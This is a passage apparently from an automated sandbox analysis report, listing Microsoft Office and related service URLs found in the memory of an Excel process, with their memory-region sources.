      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://api.onedrive.com
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmpString found in binary or memory: https://api.onedrive.comMBI
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://api.onedrive.comce
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groupsu
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://apis.live.net/v5.0/S
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/S2
      Source: EXCEL.EXEString found in binary or memory: https://augloop.dod.online.office365.us
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://augloop.office.com
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com%
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://augloop.office.com/v2
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.470099621.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.340254925.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291670975.000000000FEA2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.488934838.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461355081.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.467269536.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.493139849.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.490225001.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.475810638.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491199060.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.610983542.000000000FEA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.419576881.000000000FEA0000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
      Source: EXCEL.EXE, 00000001.00000003.488654985.000000000FD75000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.475934601.000000000FD75000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.467719465.000000000FD75000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461793870.000000000FD75000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.489721327.000000000FD75000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.610610633.000000000FD75000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlW
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://cdn.entity.
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.c
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.pngOutlookConnectorManifesthttps:
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpselllOh
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsellLiveProfileServicehttps
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/abuc
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://clients.config.office.net/
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/4K
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/Bearer
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/https://loguc
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policieshttps://login.windows.net/common/oauth2/
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/iosBearer
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/ioshtt
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/macBearer
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/machttps://login.windows.net/common/oauth2/authorize
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyL
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://config.edge.skype.com
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.com/config/v2/Officeb
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://cortana.ai
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://cortana.ai/api
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai/api-Y
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aiIY
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aietl
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://cr.office.com
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com-L
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: EXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/4
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com6L
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comLL
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comPI
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comUV
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comxLu
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000001.00000003.340165432.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.476324827.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.488905407.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.462619600.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.610948124.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.490100931.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.467872426.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420012413.000000000FE6F000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://dev.cortana.ai
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://dev.cortana.ai2Y
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/H
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://devnull.onenote.com
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comt
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://directory.services.
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://enrichment.osi.office.net/
